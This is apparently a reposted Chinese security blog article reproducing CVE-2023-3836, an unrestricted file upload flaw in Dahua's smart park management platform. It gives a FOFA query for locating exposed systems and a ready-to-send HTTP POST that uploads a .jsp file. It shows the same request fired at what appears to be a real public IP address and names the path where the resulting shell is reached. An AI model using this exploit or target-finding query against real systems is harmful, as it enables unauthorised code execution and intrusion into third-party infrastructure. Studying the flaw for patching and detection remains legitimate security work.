当前位置: 首页 > news >正文

CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现

news 2025/8/22 3:53:32

文章目录

  • CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响范围
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现

CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

在大华智慧园区管理中发现了一个被归类为严重的漏洞,最高可达20230713。此漏洞影响文件 /emap/devicePoint_addImgIco?hasSubsystem=true 的未知代码。对参数上传的操作会导致无限制上传。攻击可以远程发起。该漏洞已向公众披露,并可能被使用。
在这里插入图片描述

0x03 影响范围

大华智慧园区综合管理平台

0x04 漏洞环境

fofa:“/WPMS/asset/lib/gridster/”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (POST)

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: ip:port
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="***.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary******
--f3aeb22be281d77542546a2f71e20982--

3.复现

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 202.96.139.59:9080
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary123456
--f3aeb22be281d77542546a2f71e20982--

在这里插入图片描述访问上传文件
shell地址链接:

http://127.0.0.1/upload/emap/society_new/ico_res_**********.jsp

注意:ico_res_**********.jsp 替换成上传数据包回显的文件名
在这里插入图片描述

http://www.lryc.cn/news/158300.html

相关文章:

  • LAMP搭建WordPress
  • 【数学建模竞赛】预测类赛题常用算法解析
  • OFDM 系统在 AWGN 信道下对不同载波频率偏移 (CFO) 的 BER 灵敏度研究(Matlab代码实现)
  • go基础07-了解map实现原理并高效使用
  • SpringMVC进阶:常用注解、参数传递和请求响应以及页面跳转
  • nacos - centos7.x环境单机与集群快速部署
  • 文心一言初体验,和ChatGPT语言理解能力比较
  • 浏览器进程,性能指标,性能优化
  • Python基础set集合定义与函数
  • 【大数据之Kafka】九、Kafka Broker之文件存储及高效读写数据
  • Android 使用Camera2 API 和 GLSurfaceView实现相机预览
  • 说说IO多路复用
  • mysql 锁解决的办法
  • C++零碎记录(五)
  • 玩转Mysql系列 - 第16篇:变量详解
  • Windows云服务器 PHP搭建网站外网无法访问的问题
  • TuyaOS Sensor Hub组件介绍
  • 【实战】React17+React Hook+TS4 最佳实践,仿 Jira 企业级项目(总结展望篇)
  • Leetcode.321 拼接最大数
  • 数学建模竞赛常用代码总结-PythonMatlab
  • 在Ubuntu上安装CUDA和cuDNN以及验证安装步骤
  • SecureCRT ssh链接服务器
  • linux之perf(3)top实时性能
  • 【linux命令讲解大全】076.pgrep命令:查找和列出符合条件的进程ID
  • 微信小程序开发---条件渲染和列表渲染
  • 【ES6】require、export和import的用法
  • Vue + Element UI 前端篇(九):接口格式定义
  • 部署Django报错-requires SQLite 3.8.3 or higher
  • 什么是网络存储服务器
  • lv3 嵌入式开发-10 NFS服务器搭建及使用